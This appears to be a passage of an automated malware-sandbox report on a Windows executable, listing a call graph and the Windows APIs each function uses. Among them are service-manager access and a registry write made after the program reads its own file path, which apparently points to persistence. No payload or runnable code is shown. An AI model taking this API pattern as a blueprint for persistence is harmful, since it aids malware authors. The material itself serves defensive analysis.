7ff6f18a2465 memmove 11029->11031 11032 7ff6f18a2460 11029->11032 11033 7ff6f18a243b 11029->11033 11035 7ff6f18a249f 11030->11035 11031->10048 11034 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11032->11034 11036 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11033->11036 11034->11031 11037 7ff6f18a2443 11036->11037 11038 7ff6f18a2459 _invalid_parameter_noinfo_noreturn 11037->11038 11039 7ff6f18a244b 11037->11039 11038->11032 11039->11031 11041 7ff6f18a2fef 11040->11041 11043 7ff6f18a2370 6 API calls 11041->11043 11059 7ff6f18a3200 11041->11059 11042 7ff6f18cdbf0 Concurrency::wait 8 API calls 11044 7ff6f18a3216 11042->11044 11045 7ff6f18a302a 11043->11045 11044->10052 11044->10062 11084 7ff6f18acf10 11045->11084 11050 7ff6f18a30a4 11110 7ff6f18cd564 11050->11110 11051 7ff6f18a309f 11053 7ff6f18cdfc4 ISource free 11051->11053 11052 7ff6f18a3098 _invalid_parameter_noinfo_noreturn 11052->11051 11053->11050 11056 7ff6f18a30ff 11064 7ff6f18a30f3 11056->11064 11116 7ff6f18cd5d8 11056->11116 11058 7ff6f18cd524 2 API calls 11060 7ff6f18a30c2 11058->11060 11059->11042 11060->11058 11060->11064 11061 7ff6f18a31fb 11062 7ff6f18cdfc4 ISource free 11061->11062 11062->11059 11063 7ff6f18a31f4 _invalid_parameter_noinfo_noreturn 11063->11061 11064->11059 11064->11061 11064->11063 11066 7ff6f18a3402 11065->11066 11067 7ff6f18a343d 11065->11067 11066->11067 11069 7ff6f18a3435 11066->11069 11071 7ff6f18a3486 _invalid_parameter_noinfo_noreturn 11066->11071 11068 7ff6f18a3230 22 API calls 11067->11068 11070 7ff6f18a3475 11068->11070 11072 7ff6f18cdfc4 ISource free 11069->11072 11070->10062 11073 7ff6f18a34d5 11071->11073 11075 7ff6f18a34a3 11071->11075 11072->11067 11073->10062 11074 7ff6f18a34cd 11077 7ff6f18cdfc4 ISource free 11074->11077 11075->11074 11076 7ff6f18a34ed _invalid_parameter_noinfo_noreturn 11075->11076 11078 7ff6f18a350f 11076->11078 11077->11073 11078->10062 11080 7ff6f18cd54e FindClose 11079->11080 11081 7ff6f18ab137 11079->11081 11080->11081 11082 7ff6f18cd558 abort 11080->11082 11081->10055 11081->10057 11081->10059 11082->11081 11085 7ff6f18ad048 11084->11085 11086 7ff6f18acf56 memmove 11084->11086 11152 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 11085->11152 11090 7ff6f18a3050 11086->11090 11093 7ff6f18a1f30 11090->11093 11094 7ff6f18a1f4f 11093->11094 11095 7ff6f18a205b 11094->11095 11108 7ff6f18a203a 11094->11108 11096 7ff6f18a2089 11095->11096 11099 7ff6f18a20b1 11095->11099 11097 7ff6f18a2099 11096->11097 11098 7ff6f18a2186 11096->11098 11101 7ff6f18a2152 11097->11101 11102 7ff6f18a2127 memmove 11097->11102 11200 7ff6f18aaea0 ?_Xout_of_range@std@@YAXPEBD 11098->11200 11099->11097 11160 7ff6f18ab970 11099->11160 11180 7ff6f18abc60 11101->11180 11107 7ff6f18a2045 11102->11107 11107->11050 11107->11051 11107->11052 11153 7ff6f18a2280 11108->11153 11111 7ff6f18cd582 FindClose 11110->11111 11112 7ff6f18cd596 FindFirstFileExW 11110->11112 11111->11112 11113 7ff6f18cd58f abort 11111->11113 11114 7ff6f18cd5c1 GetLastError 11112->11114 11115 7ff6f18a30bc 11112->11115 11113->11112 11114->11115 11115->11056 11115->11060 11122 7ff6f18cd61a 11116->11122 11117 7ff6f18cd623 11118 7ff6f18cdbf0 Concurrency::wait 8 API calls 11117->11118 11119 7ff6f18cd8c5 11118->11119 11119->11064 11120 7ff6f18cd900 __std_fs_open_handle 2 API calls 11123 7ff6f18cd758 11120->11123 11121 7ff6f18cd67b GetFileAttributesExW 11124 7ff6f18cd68f GetLastError 11121->11124 11125 7ff6f18cd6e0 11121->11125 11122->11117 11122->11121 11122->11125 11126 7ff6f18cd77e 11123->11126 11127 7ff6f18cd75e 11123->11127 11124->11117 11128 7ff6f18cd69e FindFirstFileW 11124->11128 11125->11117 11125->11120 11130 7ff6f18cd82f 11126->11130 11131 7ff6f18cd78d GetFileInformationByHandleEx 11126->11131 11127->11117 11129 7ff6f18cd769 CloseHandle 11127->11129 11132 7ff6f18cd6b2 GetLastError 11128->11132 11133 7ff6f18cd6bd FindClose 11128->11133 11129->11117 11134 7ff6f18cd8f0 abort 11129->11134 11135 7ff6f18cd84a GetFileInformationByHandleEx 11130->11135 11136 7ff6f18cd88a 11130->11136 11137 7ff6f18cd7d0 11131->11137 11138 7ff6f18cd7a7 GetLastError 11131->11138 11132->11117 11133->11125 11134->11117 11135->11136 11139 7ff6f18cd860 GetLastError 11135->11139 11141 7ff6f18cd8a1 11136->11141 11142 7ff6f18cd8dd 11136->11142 11137->11130 11147 7ff6f18cd7f1 GetFileInformationByHandleEx 11137->11147 11138->11117 11140 7ff6f18cd7b5 CloseHandle 11138->11140 11139->11117 11144 7ff6f18cd872 CloseHandle 11139->11144 11140->11117 11145 7ff6f18cd7c2 abort 11140->11145 11141->11117 11146 7ff6f18cd8a7 CloseHandle 11141->11146 11142->11117 11143 7ff6f18cd8e3 CloseHandle 11142->11143 11143->11117 11143->11134 11144->11117 11149 7ff6f18cd883 abort 11144->11149 11145->11117 11146->11117 11146->11134 11147->11130 11148 7ff6f18cd80d GetLastError 11147->11148 11148->11117 11150 7ff6f18cd81b CloseHandle 11148->11150 11149->11136 11150->11117 11151 7ff6f18cd828 abort 11150->11151 11151->11130 11154 7ff6f18a228e 11153->11154 11155 7ff6f18a22f5 11153->11155 11156 7ff6f18a22e7 11154->11156 11157 7ff6f18a22a5 memmove 11154->11157 11155->11107 11201 7ff6f18abb00 11156->11201 11157->11107 11161 7ff6f18abaf1 11160->11161 11164 7ff6f18ab9a0 11160->11164 11220 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 11161->11220 11163 7ff6f18abaf6 11168 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 11163->11168 11164->11163 11165 7ff6f18aba22 11164->11165 11166 7ff6f18aba4a 11164->11166 11178 7ff6f18aba06 11164->11178 11165->11163 11167 7ff6f18aba2f 11165->11167 11169 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11166->11169 11170 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11167->11170 11171 7ff6f18abafc 11168->11171 11169->11178 11170->11178 11172 7ff6f18abab9 memmove 11176 7ff6f18abab0 11172->11176 11173 7ff6f18aba69 memmove 11174 7ff6f18aba90 11173->11174 11175 7ff6f18abaa5 11173->11175 11174->11175 11177 7ff6f18abab2 _invalid_parameter_noinfo_noreturn 11174->11177 11179 7ff6f18cdfc4 ISource free 11175->11179 11176->11097 11177->11172 11178->11172 11178->11173 11178->11177 11179->11176 11181 7ff6f18abe16 11180->11181 11184 7ff6f18abc9a 11180->11184 11221 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 11181->11221 11183 7ff6f18abe1b 11187 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 11183->11187 11184->11183 11185 7ff6f18abd44 11184->11185 11186 7ff6f18abd18 11184->11186 11192 7ff6f18abcfc 11184->11192 11188 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11185->11188 11186->11183 11189 7ff6f18abd25 11186->11189 11190 7ff6f18abe21 11187->11190 11188->11192 11191 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11189->11191 11191->11192 11193 7ff6f18abdd0 memmove memmove 11192->11193 11194 7ff6f18abd75 memmove memmove 11192->11194 11195 7ff6f18abdc9 _invalid_parameter_noinfo_noreturn 11192->11195 11198 7ff6f18abdc7 11193->11198 11196 7ff6f18abdbc 11194->11196 11197 7ff6f18abda7 11194->11197 11195->11193 11199 7ff6f18cdfc4 ISource free 11196->11199 11197->11195 11197->11196 11198->11107 11199->11198 11202 7ff6f18abc4e 11201->11202 11205 7ff6f18abb27 11201->11205 11219 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 11202->11219 11204 7ff6f18abc53 11208 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 11204->11208 11205->11204 11206 7ff6f18abbc9 11205->11206 11207 7ff6f18abb9d 11205->11207 11215 7ff6f18abb81 11205->11215 11209 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11206->11209 11207->11204 11211 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11207->11211 11212 7ff6f18abc59 11208->11212 11209->11215 11210 7ff6f18abbd1 memmove 11213 7ff6f18abbf6 11210->11213 11214 7ff6f18abc27 11210->11214 11211->11215 11216 7ff6f18abc1f 11213->11216 11217 7ff6f18abc47 _invalid_parameter_noinfo_noreturn 11213->11217 11214->11155 11215->11210 11215->11217 11218 7ff6f18cdfc4 ISource free 11216->11218 11217->11202 11218->11214 11223 7ff6f18a2370 6 API calls 11222->11223 11224 7ff6f18ab1ec 11223->11224 11225 7ff6f18a2fc0 60 API calls 11224->11225 11227 7ff6f18ab212 11225->11227 11226 7ff6f18ab296 11228 7ff6f18cd544 __std_fs_close_handle 2 API calls 11226->11228 11227->11226 11229 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11227->11229 11231 7ff6f18ab2f4 11228->11231 11230 7ff6f18ab25f 11229->11230 11232 7ff6f18a33b0 24 API calls 11230->11232 11233 7ff6f18ab339 11231->11233 11235 7ff6f18ab334 11231->11235 11238 7ff6f18ab32d _invalid_parameter_noinfo_noreturn 11231->11238 11232->11226 11234 7ff6f18cdbf0 Concurrency::wait 8 API calls 11233->11234 11237 7ff6f18a6e85 11234->11237 11236 7ff6f18cdfc4 ISource free 11235->11236 11236->11233 11237->10094 11237->10095 11238->11235 11240 7ff6f18a5049 11239->11240 11241 7ff6f18a503d ?_Throw_Cpp_error@std@@YAXH 11239->11241 11242 7ff6f18a5053 ?_Throw_Cpp_error@std@@YAXH 11240->11242 11243 7ff6f18a5064 11240->11243 11241->11240 11242->11243 11244 7ff6f18a5175 11243->11244 11245 7ff6f18a5076 11243->11245 11306 7ff6f18a14e0 __std_exception_copy 11244->11306 11247 7ff6f18a508c 11245->11247 11285 7ff6f18acab0 11245->11285 11251 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11247->11251 11252 7ff6f18a50c5 _Mtx_unlock _Cnd_signal 11247->11252 11251->11252 11255 7ff6f18a5144 11252->11255 11253 7ff6f18cdbf0 Concurrency::wait 8 API calls 11254 7ff6f18a5161 11253->11254 11254->10120 11255->11253 11262 7ff6f18a3596 11256->11262 11266 7ff6f18a35e2 11256->11266 11257 7ff6f18a36c3 11259 7ff6f18cd524 2 API calls 11257->11259 11258 7ff6f18a367b 11260 7ff6f18a3689 11258->11260 11310 7ff6f18ad760 11258->11310 11267 7ff6f18a36d1 11259->11267 11263 7ff6f18a2fc0 60 API calls 11260->11263 11264 7ff6f18cd5d8 31 API calls 11262->11264 11262->11266 11276 7ff6f18a36bf 11263->11276 11264->11266 11265 7ff6f18a3873 11269 7ff6f18a3230 22 API calls 11265->11269 11266->11257 11266->11258 11272 7ff6f18a361c 11266->11272 11271 7ff6f18cd524 2 API calls 11267->11271 11267->11276 11268 7ff6f18cdbf0 Concurrency::wait 8 API calls 11270 7ff6f18a3892 11268->11270 11269->11272 11270->10120 11271->11267 11272->11268 11273 7ff6f18cd544 FindClose abort __std_fs_close_handle 11273->11276 11274 7ff6f18a38fa 11328 7ff6f18aaea0 ?_Xout_of_range@std@@YAXPEBD 11274->11328 11276->11265 11276->11272 11276->11273 11276->11274 11278 7ff6f18cd524 FindNextFileW GetLastError 11276->11278 11278->11276 11288 7ff6f18acae0 11285->11288 11286 7ff6f18acca1 11309 7ff6f18acef0 ?_Xlength_error@std@@YAXPEBD 11286->11309 11288->11286 11289 7ff6f18acc9c 11288->11289 11292 7ff6f18acb41 11288->11292 11293 7ff6f18acb6d 11288->11293 11296 7ff6f18acb34 11288->11296 11291 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 11289->11291 11291->11286 11292->11289 11299 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11292->11299 11294 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11293->11294 11294->11296 11295 7ff6f18acba8 memmove 11297 7ff6f18acc02 memmove memmove 11295->11297 11298 7ff6f18acbdd memmove memset 11295->11298 11296->11295 11296->11296 11303 7ff6f18acc95 _invalid_parameter_noinfo_noreturn 11296->11303 11300 7ff6f18acc33 memset 11297->11300 11298->11300 11299->11296 11301 7ff6f18acc4d 11300->11301 11302 7ff6f18acc7b 11300->11302 11301->11303 11304 7ff6f18acc73 11301->11304 11302->11247 11303->11289 11305 7ff6f18cdfc4 ISource free 11304->11305 11305->11302 11307 7ff6f18cdbf0 Concurrency::wait 8 API calls 11306->11307 11308 7ff6f18a1542 _CxxThrowException 11307->11308 11311 7ff6f18ad95b 11310->11311 11315 7ff6f18ad79e 11310->11315 11329 7ff6f18aced0 ?_Xlength_error@std@@YAXPEBD 11311->11329 11312 7ff6f18ad960 11314 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 11312->11314 11316 7ff6f18ad966 11314->11316 11315->11312 11317 7ff6f18ad802 11315->11317 11318 7ff6f18ad82b 11315->11318 11323 7ff6f18ad7f5 11315->11323 11317->11312 11320 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11317->11320 11319 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11318->11319 11319->11323 11320->11323 11321 7ff6f18ad925 11321->11260 11322 7ff6f18ad8f1 11324 7ff6f18ad954 _invalid_parameter_noinfo_noreturn 11322->11324 11325 7ff6f18ad91d 11322->11325 11323->11321 11323->11322 11323->11324 11326 7ff6f18cd544 __std_fs_close_handle 2 API calls 11323->11326 11324->11311 11327 7ff6f18cdfc4 ISource free 11325->11327 11326->11323 11327->11321 11338 7ff6f18a9afd 11331->11338 11332 7ff6f18a9bb1 11334 7ff6f18a9bd8 _invalid_parameter_noinfo_noreturn 11332->11334 11333 7ff6f18a9b7f 11333->11334 11335 7ff6f18cdfc4 ISource free 11333->11335 11336 7ff6f18a9bf1 11334->11336 11337 7ff6f18a9c40 11334->11337 11335->11332 11339 7ff6f18a9c0f 11336->11339 11344 7ff6f18a9c53 terminate 11336->11344 11337->10169 11338->11332 11338->11333 11340 7ff6f18cdfc4 ISource free 11338->11340 11341 7ff6f18a9c38 11339->11341 11342 7ff6f18a9c5a _invalid_parameter_noinfo_noreturn 11339->11342 11340->11338 11343 7ff6f18cdfc4 ISource free 11341->11343 11345 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11342->11345 11343->11337 11344->11342 11346 7ff6f18a9c87 memset 11345->11346 11349 7ff6f18aa4c0 11346->11349 11350 7ff6f18aa55f 11349->11350 11352 7ff6f18aa504 11349->11352 11361 7ff6f18aa630 11350->11361 11352->11350 11354 7ff6f18aa541 memset _errno _invalid_parameter_noinfo 11352->11354 11355 7ff6f18aa53a memmove 11352->11355 11353 7ff6f18aa574 11356 7ff6f18aa630 4 API calls 11353->11356 11354->11350 11355->11350 11358 7ff6f18aa587 11356->11358 11357 7ff6f18a9cab 11357->10169 11358->11357 11359 7ff6f18aa5e6 memmove 11358->11359 11360 7ff6f18aa5ed memset _errno _invalid_parameter_noinfo 11358->11360 11359->11357 11360->11357 11362 7ff6f18aa6bd 11361->11362 11363 7ff6f18aa654 11361->11363 11362->11353 11363->11362 11364 7ff6f18aa698 memset _errno _invalid_parameter_noinfo 11363->11364 11365 7ff6f18aa687 memmove 11363->11365 11364->11353 11365->11353 11367 7ff6f18cde56 RtlLookupFunctionEntry 11366->11367 11368 7ff6f18cdc6f 11367->11368 11369 7ff6f18cde6c RtlVirtualUnwind 11367->11369 11370 7ff6f18cdc10 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11368->11370 11369->11367 11369->11368 11372 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 11371->11372 11373 7ff6f18a2646 11372->11373 11392 7ff6f18a1620 11373->11392 11375 7ff6f18a2661 __std_exception_copy 11377 7ff6f18a26df 11375->11377 11378 7ff6f18a26aa 11375->11378 11380 7ff6f18a2370 6 API calls 11377->11380 11379 7ff6f18a26da 11378->11379 11381 7ff6f18a26d3 _invalid_parameter_noinfo_noreturn 11378->11381 11382 7ff6f18cdfc4 ISource free 11379->11382 11383 7ff6f18a26fd 11380->11383 11381->11379 11382->11377 11411 7ff6f18a2800 11383->11411 11386 7ff6f18a27c6 11387 7ff6f18cdbf0 Concurrency::wait 8 API calls 11386->11387 11390 7ff6f18a27da _CxxThrowException 11387->11390 11388 7ff6f18a27c1 11389 7ff6f18cdfc4 ISource free 11388->11389 11389->11386 11391 7ff6f18a27ba _invalid_parameter_noinfo_noreturn 11391->11388 11393 7ff6f18a1656 11392->11393 11394 7ff6f18a166b 11392->11394 11395 7ff6f18aada0 Concurrency::wait memmove 11393->11395 11396 7ff6f18aada0 Concurrency::wait memmove 11394->11396 11395->11394 11397 7ff6f18a169c 11396->11397 11398 7ff6f18a16dd 11397->11398 11399 7ff6f18a16d8 11397->11399 11401 7ff6f18a16d1 _invalid_parameter_noinfo_noreturn 11397->11401 11400 7ff6f18a173e 11398->11400 11403 7ff6f18a1736 11398->11403 11405 7ff6f18a176d _invalid_parameter_noinfo_noreturn __std_exception_destroy 11398->11405 11402 7ff6f18cdfc4 ISource free 11399->11402 11404 7ff6f18cdbf0 Concurrency::wait 8 API calls 11400->11404 11401->11399 11402->11398 11406 7ff6f18cdfc4 ISource free 11403->11406 11407 7ff6f18a175d 11404->11407 11408 7ff6f18a17b5 11405->11408 11409 7ff6f18a17a8 11405->11409 11406->11400 11407->11375 11408->11375 11410 7ff6f18cdfc4 ISource free 11409->11410 11410->11408 11412 7ff6f18cd2c4 __std_fs_code_page 2 API calls 11411->11412 11413 7ff6f18a2864 11412->11413 11440 7ff6f18aaf30 11413->11440 11416 7ff6f18aaf30 19 API calls 11417 7ff6f18a28cc 11416->11417 11418 7ff6f18a2901 11417->11418 11455 7ff6f18abe30 11417->11455 11420 7ff6f18aada0 Concurrency::wait memmove 11418->11420 11421 7ff6f18a2914 11420->11421 11422 7ff6f18aada0 Concurrency::wait memmove 11421->11422 11423 7ff6f18a2929 11422->11423 11424 7ff6f18aada0 Concurrency::wait memmove 11423->11424 11425 7ff6f18a2943 11424->11425 11426 7ff6f18a2976 11425->11426 11427 7ff6f18aada0 Concurrency::wait memmove 11425->11427 11430 7ff6f18a29e9 11426->11430 11432 7ff6f18a29e4 11426->11432 11433 7ff6f18a29dd _invalid_parameter_noinfo_noreturn 11426->11433 11428 7ff6f18a295c 11427->11428 11429 7ff6f18aada0 Concurrency::wait memmove 11428->11429 11429->11426 11431 7ff6f18a2a37 11430->11431 11435 7ff6f18a2a32 11430->11435 11437 7ff6f18a2a2b _invalid_parameter_noinfo_noreturn 11430->11437 11436 7ff6f18cdbf0 Concurrency::wait 8 API calls 11431->11436 11434 7ff6f18cdfc4 ISource free 11432->11434 11433->11432 11434->11430 11438 7ff6f18cdfc4 ISource free 11435->11438 11439 7ff6f18a2780 11436->11439 11437->11435 11438->11431 11439->11386 11439->11388 11439->11391 11441 7ff6f18aaf78 11440->11441 11442 7ff6f18a2899 11440->11442 11454 7ff6f18aaffb 11441->11454 11475 7ff6f18cd458 WideCharToMultiByte 11441->11475 11442->11416 11444 7ff6f18a18c0 13 API calls 11446 7ff6f18ab001 11444->11446 11447 7ff6f18a1ba0 12 API calls 11446->11447 11449 7ff6f18ab00d 11447->11449 11448 7ff6f18aad10 memset 11450 7ff6f18aafb2 11448->11450 11451 7ff6f18cd458 4 API calls 11450->11451 11452 7ff6f18aafd1 11451->11452 11452->11442 11453 7ff6f18a1ba0 12 API calls 11452->11453 11453->11454 11454->11444 11456 7ff6f18abf6d 11455->11456 11459 7ff6f18abe59 11455->11459 11481 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 11456->11481 11458 7ff6f18abf72 11461 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 11458->11461 11462 7ff6f18abea4 11459->11462 11463 7ff6f18abeb1 11459->11463 11464 7ff6f18abee9 11459->11464 11469 7ff6f18abebe 11459->11469 11460 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11460->11462 11466 7ff6f18abf78 11461->11466 11467 7ff6f18abf06 memmove 11462->11467 11468 7ff6f18abf47 memmove 11462->11468 11470 7ff6f18abf40 _invalid_parameter_noinfo_noreturn 11462->11470 11463->11458 11463->11469 11465 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11464->11465 11465->11462 11471 7ff6f18abf1e 11467->11471 11472 7ff6f18abf33 11467->11472 11473 7ff6f18abf3e 11468->11473 11469->11460 11470->11468 11471->11470 11471->11472 11474 7ff6f18cdfc4 ISource free 11472->11474 11473->11418 11474->11473 11476 7ff6f18cd4af GetLastError 11475->11476 11477 7ff6f18cd4b7 11475->11477 11476->11477 11478 7ff6f18aaf99 11477->11478 11479 7ff6f18cd4c4 WideCharToMultiByte 11477->11479 11478->11446 11478->11448 11479->11478 11480 7ff6f18cd4f2 GetLastError 11479->11480 11480->11478 11483 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 11482->11483 11484 7ff6f18a24d2 11483->11484 11485 7ff6f18a1620 13 API calls 11484->11485 11486 7ff6f18a24ec __std_exception_copy 11485->11486 11488 7ff6f18a2535 11486->11488 11489 7ff6f18a256a 11486->11489 11490 7ff6f18a2565 11488->11490 11491 7ff6f18a255e _invalid_parameter_noinfo_noreturn 11488->11491 11493 7ff6f18abf80 7 API calls 11489->11493 11492 7ff6f18cdfc4 ISource free 11490->11492 11491->11490 11492->11489 11494 7ff6f18a25e2 11493->11494 11495 7ff6f18cdbf0 Concurrency::wait 8 API calls 11494->11495 11496 7ff6f18a25f6 _CxxThrowException __std_exception_copy 11495->11496 11496->10197 11498 7ff6f18cdeb0 std::_Facet_Register 3 API calls 11497->11498 11499 7ff6f18ab922 11498->11499 11499->10205 11503 7ff6f18a1be0 11500->11503 11502 7ff6f18a1c1e _CxxThrowException __std_exception_copy 11502->10215 11503->11502
                APIs
                  • Part of subcall function 00007FF6F18ABF80: memmove.VCRUNTIME140(?,?,?,?,00007FF6F18AA27E,?,?,00000002,00007FF6F18B2E91), ref: 00007FF6F18ABFB8
                  • Part of subcall function 00007FF6F18ABF80: memmove.VCRUNTIME140(?,?,?,?,00007FF6F18AA27E,?,?,00000002,00007FF6F18B2E91), ref: 00007FF6F18AC058
                  • Part of subcall function 00007FF6F18A73F0: OpenSCManagerW.ADVAPI32 ref: 00007FF6F18A7414
                  • Part of subcall function 00007FF6F18A73F0: GetLastError.KERNEL32 ref: 00007FF6F18A7438
                  • Part of subcall function 00007FF6F18A73F0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A7443
                  • Part of subcall function 00007FF6F18A73F0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A7453
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7B37
                • memmove.VCRUNTIME140 ref: 00007FF6F18A7BB4
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7C05
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A7DC9
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A821A
                • GetModuleFileNameA.KERNEL32 ref: 00007FF6F18A8230
                • RegOpenKeyExW.ADVAPI32 ref: 00007FF6F18A829E
                • RegSetValueExW.ADVAPI32 ref: 00007FF6F18A8329
                • RegCloseKey.ADVAPI32 ref: 00007FF6F18A8334
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A8379
                • GetLastError.KERNEL32 ref: 00007FF6F18A839D
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A83A8
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A83B8
                  • Part of subcall function 00007FF6F18A76A0: _dupenv_s.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FF6F18A76EF
                  • Part of subcall function 00007FF6F18A76A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A77A4
                  • Part of subcall function 00007FF6F18A76A0: memset.VCRUNTIME140 ref: 00007FF6F18A77D0
                  • Part of subcall function 00007FF6F18A76A0: ??Bios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18A782F
                  • Part of subcall function 00007FF6F18ABF80: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18AC076
                  • Part of subcall function 00007FF6F18ABF80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6F18AA27E,?,?,00000002,00007FF6F18B2E91), ref: 00007FF6F18AC035
                  • Part of subcall function 00007FF6F18A98F0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF6F18A7A10), ref: 00007FF6F18A9985
                  • Part of subcall function 00007FF6F18A98F0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18A9A21
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A83F3
                • memset.VCRUNTIME140 ref: 00007FF6F18A851B
                • _Thrd_hardware_concurrency.MSVCP140 ref: 00007FF6F18A8520
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7EBC
                  • Part of subcall function 00007FF6F18CDEB0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18CDEE0
                  • Part of subcall function 00007FF6F18CDEB0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18CDEE6
                • memmove.VCRUNTIME140 ref: 00007FF6F18A7F35
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7F91
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7FED
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A803E
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A7C50
                  • Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A8B82
                  • Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB3E9
                  • Part of subcall function 00007FF6F18AB370: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB409
                  • Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB419
                  • Part of subcall function 00007FF6F18AB370: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4FC
                  • Part of subcall function 00007FF6F18AB370: ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB503
                  • Part of subcall function 00007FF6F18AB370: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB510
                • _Cnd_init_in_situ.MSVCP140 ref: 00007FF6F18A85D5
                • __std_fs_code_page.MSVCPRT ref: 00007FF6F18A865E
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A86E5
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A881C
                  • Part of subcall function 00007FF6F18AB370: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB466
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A8983
                  • Part of subcall function 00007FF6F18A4E70: _Mtx_lock.MSVCP140 ref: 00007FF6F18A4E8B
                  • Part of subcall function 00007FF6F18A4E70: ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A4EB3
